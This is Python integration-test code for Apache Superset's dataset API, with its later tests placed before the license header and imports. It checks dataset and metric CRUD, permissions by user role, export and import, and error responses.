# try to insert a new column ID that already exists
data = {
"metrics": [
{"metric_name": "dup", "expression": "COUNT(*)"},
{"metric_name": "dup", "expression": "DIFF_COUNT(*)"},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"metrics": ["One or more metrics are duplicated"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_gamma(self):
"""
Dataset API: Test update dataset item gamma
"""
dataset = self.insert_default_dataset()
self.login(username="gamma")
table_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.put(uri, json=table_data)
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_not_owned(self):
"""
Dataset API: Test update dataset item not owned
"""
dataset = self.insert_default_dataset()
self.login(username="alpha")
table_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, table_data, "put")
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_owners_invalid(self):
"""
Dataset API: Test update dataset item owner invalid
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
table_data = {"description": "changed_description", "owners": [1000]}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, table_data, "put")
assert rv.status_code == 422
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_uniqueness(self):
"""
Dataset API: Test update dataset uniqueness
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
ab_user = self.insert_dataset(
"ab_user", [self.get_user("admin").id], get_main_database()
)
table_data = {"table_name": "ab_user"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, table_data, "put")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
expected_response = {
"message": {"table_name": ["Dataset ab_user already exists"]}
}
assert data == expected_response
db.session.delete(dataset)
db.session.delete(ab_user)
db.session.commit()
@patch("superset.datasets.dao.DatasetDAO.update")
def test_update_dataset_sqlalchemy_error(self, mock_dao_update):
"""
Dataset API: Test update dataset sqlalchemy error
"""
mock_dao_update.side_effect = DAOUpdateFailedError()
dataset = self.insert_default_dataset()
self.login(username="admin")
table_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.put(uri, json=table_data)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset could not be updated."}
db.session.delete(dataset)
db.session.commit()
def test_delete_dataset_item(self):
"""
Dataset API: Test delete dataset item
"""
dataset = self.insert_default_dataset()
view_menu = security_manager.find_view_menu(dataset.get_perm())
assert view_menu is not None
view_menu_id = view_menu.id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.delete(uri)
assert rv.status_code == 200
non_view_menu = db.session.query(security_manager.viewmenu_model).get(
view_menu_id
)
assert non_view_menu is None
def test_delete_item_dataset_not_owned(self):
"""
Dataset API: Test delete item not owned
"""
dataset = self.insert_default_dataset()
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.delete_assert_metric(uri, "delete")
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
def test_delete_dataset_item_not_authorized(self):
"""
Dataset API: Test delete item not authorized
"""
dataset = self.insert_default_dataset()
self.login(username="gamma")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.delete(uri)
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
@patch("superset.datasets.dao.DatasetDAO.delete")
def test_delete_dataset_sqlalchemy_error(self, mock_dao_delete):
"""
Dataset API: Test delete dataset sqlalchemy error
"""
mock_dao_delete.side_effect = DAODeleteFailedError()
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.delete_assert_metric(uri, "delete")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset could not be deleted."}
db.session.delete(dataset)
db.session.commit()
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_column(self):
"""
Dataset API: Test delete dataset column
"""
dataset = self.get_fixture_datasets()[0]
column_id = dataset.columns[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/column/{column_id}"
rv = self.client.delete(uri)
assert rv.status_code == 200
assert db.session.query(TableColumn).get(column_id) == None
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_column_not_found(self):
"""
Dataset API: Test delete dataset column not found
"""
dataset = self.get_fixture_datasets()[0]
non_id = self.get_nonexistent_numeric_id(TableColumn)
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/column/{non_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
non_id = self.get_nonexistent_numeric_id(SqlaTable)
column_id = dataset.columns[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{non_id}/column/{column_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_column_not_owned(self):
"""
Dataset API: Test delete dataset column not owned
"""
dataset = self.get_fixture_datasets()[0]
column_id = dataset.columns[0].id
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}/column/{column_id}"
rv = self.client.delete(uri)
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
@patch("superset.datasets.dao.DatasetDAO.delete")
def test_delete_dataset_column_fail(self, mock_dao_delete):
"""
Dataset API: Test delete dataset column
"""
mock_dao_delete.side_effect = DAODeleteFailedError()
dataset = self.get_fixture_datasets()[0]
column_id = dataset.columns[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/column/{column_id}"
rv = self.client.delete(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset column delete failed."}
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_metric(self):
"""
Dataset API: Test delete dataset metric
"""
dataset = self.get_fixture_datasets()[0]
test_metric = SqlMetric(
metric_name="metric1", expression="COUNT(*)", table=dataset
)
db.session.add(test_metric)
db.session.commit()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/metric/{test_metric.id}"
rv = self.client.delete(uri)
assert rv.status_code == 200
assert db.session.query(SqlMetric).get(test_metric.id) == None
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_metric_not_found(self):
"""
Dataset API: Test delete dataset metric not found
"""
dataset = self.get_fixture_datasets()[0]
non_id = self.get_nonexistent_numeric_id(SqlMetric)
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/metric/{non_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
non_id = self.get_nonexistent_numeric_id(SqlaTable)
metric_id = dataset.metrics[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{non_id}/metric/{metric_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_metric_not_owned(self):
"""
Dataset API: Test delete dataset metric not owned
"""
dataset = self.get_fixture_datasets()[0]
metric_id = dataset.metrics[0].id
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}/metric/{metric_id}"
rv = self.client.delete(uri)
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
@patch("superset.datasets.dao.DatasetDAO.delete")
def test_delete_dataset_metric_fail(self, mock_dao_delete):
"""
Dataset API: Test delete dataset metric
"""
mock_dao_delete.side_effect = DAODeleteFailedError()
dataset = self.get_fixture_datasets()[0]
column_id = dataset.metrics[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/metric/{column_id}"
rv = self.client.delete(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset metric delete failed."}
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_dataset_items(self):
"""
Dataset API: Test bulk delete dataset items
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
view_menu_names = []
for dataset in datasets:
view_menu_names.append(dataset.get_perm())
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
expected_response = {"message": f"Deleted {len(datasets)} datasets"}
assert data == expected_response
datasets = (
db.session.query(SqlaTable)
.filter(SqlaTable.table_name.in_(self.fixture_tables_names))
.all()
)
assert datasets == []
# Assert permissions get cleaned
for view_menu_name in view_menu_names:
assert security_manager.find_view_menu(view_menu_name) is None
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_item_dataset_not_owned(self):
"""
Dataset API: Test bulk delete item not owned
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
self.login(username="alpha")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_item_not_found(self):
"""
Dataset API: Test bulk delete item not found
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
dataset_ids.append(db.session.query(func.max(SqlaTable.id)).scalar())
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_dataset_item_not_authorized(self):
"""
Dataset API: Test bulk delete item not authorized
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
self.login(username="gamma")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.client.delete(uri)
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_dataset_item_incorrect(self):
"""
Dataset API: Test bulk delete item incorrect request
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
dataset_ids.append("Wrong")
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.client.delete(uri)
assert rv.status_code == 400
def test_dataset_item_refresh(self):
"""
Dataset API: Test item refresh
"""
dataset = self.insert_default_dataset()
# delete a column
id_column = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id, column_name="id")
.one()
)
db.session.delete(id_column)
db.session.commit()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/refresh"
rv = self.put_assert_metric(uri, {}, "refresh")
assert rv.status_code == 200
# Assert the column is restored on refresh
id_column = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id, column_name="id")
.one()
)
assert id_column is not None
db.session.delete(dataset)
db.session.commit()
def test_dataset_item_refresh_not_found(self):
"""
Dataset API: Test item refresh not found dataset
"""
max_id = db.session.query(func.max(SqlaTable.id)).scalar()
self.login(username="admin")
uri = f"api/v1/dataset/{max_id + 1}/refresh"
rv = self.put_assert_metric(uri, {}, "refresh")
assert rv.status_code == 404
def test_dataset_item_refresh_not_owned(self):
"""
Dataset API: Test item refresh not owned dataset
"""
dataset = self.insert_default_dataset()
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}/refresh"
rv = self.put_assert_metric(uri, {}, "refresh")
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
@unittest.skip("test is failing stochastically")
def test_export_dataset(self):
"""
Dataset API: Test export dataset
"""
birth_names_dataset = self.get_birth_names_dataset()
# TODO: fix test for presto
# debug with dump: https://github.com/apache/superset/runs/1092546855
if birth_names_dataset.database.backend in {"presto", "hive"}:
return
argument = [birth_names_dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 200
cli_export = export_to_dict(
session=db.session,
recursive=True,
back_references=False,
include_defaults=False,
)
cli_export_tables = cli_export["databases"][0]["tables"]
expected_response = {}
for export_table in cli_export_tables:
if export_table["table_name"] == "birth_names":
expected_response = export_table
break
ui_export = yaml.safe_load(rv.data.decode("utf-8"))
assert ui_export[0] == expected_response
def test_export_dataset_not_found(self):
"""
Dataset API: Test export dataset not found
"""
max_id = db.session.query(func.max(SqlaTable.id)).scalar()
# Just one does not exist and we get 404
argument = [max_id + 1, 1]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_export_dataset_gamma(self):
"""
Dataset API: Test export dataset has gamma
"""
dataset = self.get_fixture_datasets()[0]
argument = [dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="gamma")
rv = self.client.get(uri)
assert rv.status_code == 403
perm1 = security_manager.find_permission_view_menu("can_export", "Dataset")
perm2 = security_manager.find_permission_view_menu(
"datasource_access", dataset.perm
)
# add perissions to allow export + access to query this dataset
gamma_role = security_manager.find_role("Gamma")
security_manager.add_permission_role(gamma_role, perm1)
security_manager.add_permission_role(gamma_role, perm2)
rv = self.client.get(uri)
assert rv.status_code == 200
@patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
{"VERSIONED_EXPORT": True},
clear=True,
)
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_export_dataset_bundle(self):
"""
Dataset API: Test export dataset
"""
birth_names_dataset = self.get_birth_names_dataset()
# TODO: fix test for presto
# debug with dump: https://github.com/apache/superset/runs/1092546855
if birth_names_dataset.database.backend in {"presto", "hive"}:
return
argument = [birth_names_dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 200
buf = BytesIO(rv.data)
assert is_zipfile(buf)
@patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
{"VERSIONED_EXPORT": True},
clear=True,
)
def test_export_dataset_bundle_not_found(self):
"""
Dataset API: Test export dataset not found
"""
# Just one does not exist and we get 404
argument = [-1, 1]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 404
@patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
{"VERSIONED_EXPORT": True},
clear=True,
)
@pytest.mark.usefixtures("create_datasets")
def test_export_dataset_bundle_gamma(self):
"""
Dataset API: Test export dataset has gamma
"""
dataset = self.get_fixture_datasets()[0]
argument = [dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="gamma")
rv = self.client.get(uri)
# gamma users by default do not have access to this dataset
assert rv.status_code == 403
@unittest.skip("Number of related objects depend on DB")
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_get_dataset_related_objects(self):
"""
Dataset API: Test get chart and dashboard count related to a dataset
:return:
"""
self.login(username="admin")
table = self.get_birth_names_dataset()
uri = f"api/v1/dataset/{table.id}/related_objects"
rv = self.get_assert_metric(uri, "related_objects")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response["charts"]["count"] == 18
assert response["dashboards"]["count"] == 1
def test_get_dataset_related_objects_not_found(self):
"""
Dataset API: Test related objects not found
"""
max_id = db.session.query(func.max(SqlaTable.id)).scalar()
# id does not exist and we get 404
invalid_id = max_id + 1
uri = f"api/v1/dataset/{invalid_id}/related_objects/"
self.login(username="admin")
rv = self.client.get(uri)
assert rv.status_code == 404
self.logout()
self.login(username="gamma")
table = self.get_birth_names_dataset()
uri = f"api/v1/dataset/{table.id}/related_objects"
rv = self.client.get(uri)
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets", "create_virtual_datasets")
def test_get_datasets_custom_filter_sql(self):
"""
Dataset API: Test custom dataset_is_null_or_empty filter for sql
"""
arguments = {
"filters": [
{"col": "sql", "opr": "dataset_is_null_or_empty", "value": False}
]
}
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
assert rv.status_code == 200
data = json.loads(rv.data.decode("utf-8"))
for table_name in self.fixture_virtual_table_names:
assert table_name in [ds["table_name"] for ds in data["result"]]
arguments = {
"filters": [
{"col": "sql", "opr": "dataset_is_null_or_empty", "value": True}
]
}
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
assert rv.status_code == 200
data = json.loads(rv.data.decode("utf-8"))
for table_name in self.fixture_tables_names:
assert table_name in [ds["table_name"] for ds in data["result"]]
def test_import_dataset(self):
"""
Dataset API: Test import dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
assert database.database_name == "imported_database"
assert len(database.tables) == 1
dataset = database.tables[0]
assert dataset.table_name == "imported_dataset"
assert str(dataset.uuid) == dataset_config["uuid"]
dataset.owners = []
database.owners = []
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_dataset_v0_export(self):
num_datasets = db.session.query(SqlaTable).count()
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = BytesIO()
buf.write(json.dumps(dataset_ui_export).encode())
buf.seek(0)
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
assert db.session.query(SqlaTable).count() == num_datasets + 1
dataset = (
db.session.query(SqlaTable).filter_by(table_name="birth_names_2").one()
)
db.session.delete(dataset)
db.session.commit()
def test_import_dataset_overwrite(self):
"""
Dataset API: Test import existing dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# import again without overwrite flag
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"errors": [
{
"message": "Error importing dataset",
"error_type": "GENERIC_COMMAND_ERROR",
"level": "warning",
"extra": {
"datasets/imported_dataset.yaml": "Dataset already exists and `overwrite=true` was not passed",
"issue_codes": [
{
"code": 1010,
"message": "Issue 1010 - Superset encountered an error while running a command.",
}
],
},
}
]
}
# import with overwrite flag
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
"overwrite": "true",
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# clean up
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
dataset = database.tables[0]
dataset.owners = []
database.owners = []
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_dataset_invalid(self):
"""
Dataset API: Test import invalid dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("dataset_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(database_metadata_config).encode())
with bundle.open(
"dataset_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open(
"dataset_export/datasets/imported_dataset.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
buf.seek(0)
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"errors": [
{
"message": "Error importing dataset",
"error_type": "GENERIC_COMMAND_ERROR",
"level": "warning",
"extra": {
"metadata.yaml": {"type": ["Must be equal to SqlaTable."]},
"issue_codes": [
{
"code": 1010,
"message": (
"Issue 1010 - Superset encountered "
"an error while running a command."
),
}
],
},
}
]
}
def test_import_dataset_invalid_v0_validation(self):
"""
Dataset API: Test import invalid dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open(
"dataset_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open(
"dataset_export/datasets/imported_dataset.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
buf.seek(0)
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"errors": [
{
"message": "Could not find a valid command to import file",
"error_type": "GENERIC_COMMAND_ERROR",
"level": "warning",
"extra": {
"issue_codes": [
{
"code": 1010,
"message": "Issue 1010 - Superset encountered an error while running a command.",
}
]
},
}
]
}
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for Superset"""
import json
import unittest
from io import BytesIO
from typing import List, Optional
from unittest.mock import patch
from zipfile import is_zipfile, ZipFile
import prison
import pytest
import yaml
from sqlalchemy.sql import func
from superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn
from superset.dao.exceptions import (
DAOCreateFailedError,
DAODeleteFailedError,
DAOUpdateFailedError,
)
from superset.extensions import db, security_manager
from superset.models.core import Database
from superset.utils.core import (
backend,
get_example_database,
get_example_default_schema,
get_main_database,
)
from superset.utils.dict_import_export import export_to_dict
from tests.integration_tests.base_tests import SupersetTestCase
from tests.integration_tests.conftest import CTAS_SCHEMA_NAME
from tests.integration_tests.fixtures.birth_names_dashboard import (
load_birth_names_dashboard_with_slices,
load_birth_names_data,
)
from tests.integration_tests.fixtures.energy_dashboard import (
load_energy_table_data,
load_energy_table_with_slice,
)
from tests.integration_tests.fixtures.importexport import (
database_config,
database_metadata_config,
dataset_config,
dataset_metadata_config,
dataset_ui_export,
)
class TestDatasetApi(SupersetTestCase):
fixture_tables_names = ("ab_permission", "ab_permission_view", "ab_view_menu")
fixture_virtual_table_names = ("sql_virtual_dataset_1", "sql_virtual_dataset_2")
@staticmethod
def insert_dataset(
table_name: str,
owners: List[int],
database: Database,
sql: Optional[str] = None,
schema: Optional[str] = None,
) -> SqlaTable:
obj_owners = list()
for owner in owners:
user = db.session.query(security_manager.user_model).get(owner)
obj_owners.append(user)
table = SqlaTable(
table_name=table_name,
schema=schema,
owners=obj_owners,
database=database,
sql=sql,
)
db.session.add(table)
db.session.commit()
table.fetch_metadata()
return table
def insert_default_dataset(self):
return self.insert_dataset(
"ab_permission", [self.get_user("admin").id], get_main_database()
)
def get_fixture_datasets(self) -> List[SqlaTable]:
return (
db.session.query(SqlaTable)
.filter(SqlaTable.table_name.in_(self.fixture_tables_names))
.all()
)
@pytest.fixture()
def create_virtual_datasets(self):
with self.create_app().app_context():
datasets = []
admin = self.get_user("admin")
main_db = get_main_database()
for table_name in self.fixture_virtual_table_names:
datasets.append(
self.insert_dataset(
table_name, [admin.id], main_db, "SELECT * from ab_view_menu;",
)
)
yield datasets
# rollback changes
for dataset in datasets:
db.session.delete(dataset)
db.session.commit()
@pytest.fixture()
def create_datasets(self):
with self.create_app().app_context():
datasets = []
admin = self.get_user("admin")
main_db = get_main_database()
for tables_name in self.fixture_tables_names:
datasets.append(self.insert_dataset(tables_name, [admin.id], main_db))
yield datasets
# rollback changes
for dataset in datasets:
db.session.delete(dataset)
db.session.commit()
@staticmethod
def get_energy_usage_dataset():
example_db = get_example_database()
return (
db.session.query(SqlaTable)
.filter_by(
database=example_db,
table_name="energy_usage",
schema=get_example_default_schema(),
)
.one()
)
def create_dataset_import(self) -> BytesIO:
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("dataset_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_metadata_config).encode())
with bundle.open(
"dataset_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open(
"dataset_export/datasets/imported_dataset.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
buf.seek(0)
return buf
def test_get_dataset_list(self):
"""
Dataset API: Test get dataset list
"""
example_db = get_example_database()
self.login(username="admin")
arguments = {
"filters": [
{"col": "database", "opr": "rel_o_m", "value": f"{example_db.id}"},
{"col": "table_name", "opr": "eq", "value": "birth_names"},
]
}
uri = f"api/v1/dataset/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["count"] == 1
expected_columns = [
"changed_by",
"changed_by_name",
"changed_by_url",
"changed_on_delta_humanized",
"changed_on_utc",
"database",
"datasource_type",
"default_endpoint",
"description",
"explore_url",
"extra",
"id",
"kind",
"owners",
"schema",
"sql",
"table_name",
]
assert sorted(list(response["result"][0].keys())) == expected_columns
def test_get_dataset_list_gamma(self):
"""
Dataset API: Test get dataset list gamma
"""
self.login(username="gamma")
uri = "api/v1/dataset/"
rv = self.get_assert_metric(uri, "get_list")
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["result"] == []
def test_get_dataset_related_database_gamma(self):
"""
Dataset API: Test get dataset related databases gamma
"""
self.login(username="gamma")
uri = "api/v1/dataset/related/database"
rv = self.client.get(uri)
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["count"] == 0
assert response["result"] == []
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_get_dataset_item(self):
"""
Dataset API: Test get dataset item
"""
table = self.get_energy_usage_dataset()
main_db = get_main_database()
self.login(username="admin")
uri = f"api/v1/dataset/{table.id}"
rv = self.get_assert_metric(uri, "get")
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
expected_result = {
"cache_timeout": None,
"database": {
"backend": main_db.backend,
"database_name": "examples",
"id": 1,
},
"default_endpoint": None,
"description": "Energy consumption",
"extra": None,
"fetch_values_predicate": None,
"filter_select_enabled": False,
"is_sqllab_view": False,
"main_dttm_col": None,
"offset": 0,
"owners": [],
"schema": get_example_default_schema(),
"sql": None,
"table_name": "energy_usage",
"template_params": None,
}
if response["result"]["database"]["backend"] not in ("presto", "hive"):
assert {
k: v for k, v in response["result"].items() if k in expected_result
} == expected_result
assert len(response["result"]["columns"]) == 3
assert len(response["result"]["metrics"]) == 2
def test_get_dataset_distinct_schema(self):
"""
Dataset API: Test get dataset distinct schema
"""
def pg_test_query_parameter(query_parameter, expected_response):
uri = f"api/v1/dataset/distinct/schema?q={prison.dumps(query_parameter)}"
rv = self.client.get(uri)
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == expected_response
example_db = get_example_database()
datasets = []
if example_db.backend == "postgresql":
datasets.append(
self.insert_dataset(
"ab_permission", [], get_main_database(), schema="public"
)
)
datasets.append(
self.insert_dataset(
"columns", [], get_main_database(), schema="information_schema",
)
)
schema_values = [
"admin_database",
"information_schema",
"public",
]
expected_response = {
"count": 3,
"result": [{"text": val, "value": val} for val in schema_values],
}
self.login(username="admin")
uri = "api/v1/dataset/distinct/schema"
rv = self.client.get(uri)
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == expected_response
# Test filter
query_parameter = {"filter": "inf"}
pg_test_query_parameter(
query_parameter,
{
"count": 1,
"result": [
{"text": "information_schema", "value": "information_schema"}
],
},
)
query_parameter = {"page": 0, "page_size": 1}
pg_test_query_parameter(
query_parameter,
{
"count": 3,
"result": [{"text": "admin_database", "value": "admin_database"}],
},
)
for dataset in datasets:
db.session.delete(dataset)
db.session.commit()
def test_get_dataset_distinct_not_allowed(self):
"""
Dataset API: Test get dataset distinct not allowed
"""
self.login(username="admin")
uri = "api/v1/dataset/distinct/table_name"
rv = self.client.get(uri)
assert rv.status_code == 404
def test_get_dataset_distinct_gamma(self):
"""
Dataset API: Test get dataset distinct with gamma
"""
dataset = self.insert_default_dataset()
self.login(username="gamma")
uri = "api/v1/dataset/distinct/schema"
rv = self.client.get(uri)
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["count"] == 0
assert response["result"] == []
db.session.delete(dataset)
db.session.commit()
def test_get_dataset_info(self):
"""
Dataset API: Test get dataset info
"""
self.login(username="admin")
uri = "api/v1/dataset/_info"
rv = self.get_assert_metric(uri, "info")
assert rv.status_code == 200
def test_info_security_dataset(self):
"""
Dataset API: Test info security
"""
self.login(username="admin")
params = {"keys": ["permissions"]}
uri = f"api/v1/dataset/_info?q={prison.dumps(params)}"
rv = self.get_assert_metric(uri, "info")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert set(data["permissions"]) == {"can_read", "can_write", "can_export"}
def test_create_dataset_item(self):
"""
Dataset API: Test create dataset item
"""
main_db = get_main_database()
self.login(username="admin")
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
data = json.loads(rv.data.decode("utf-8"))
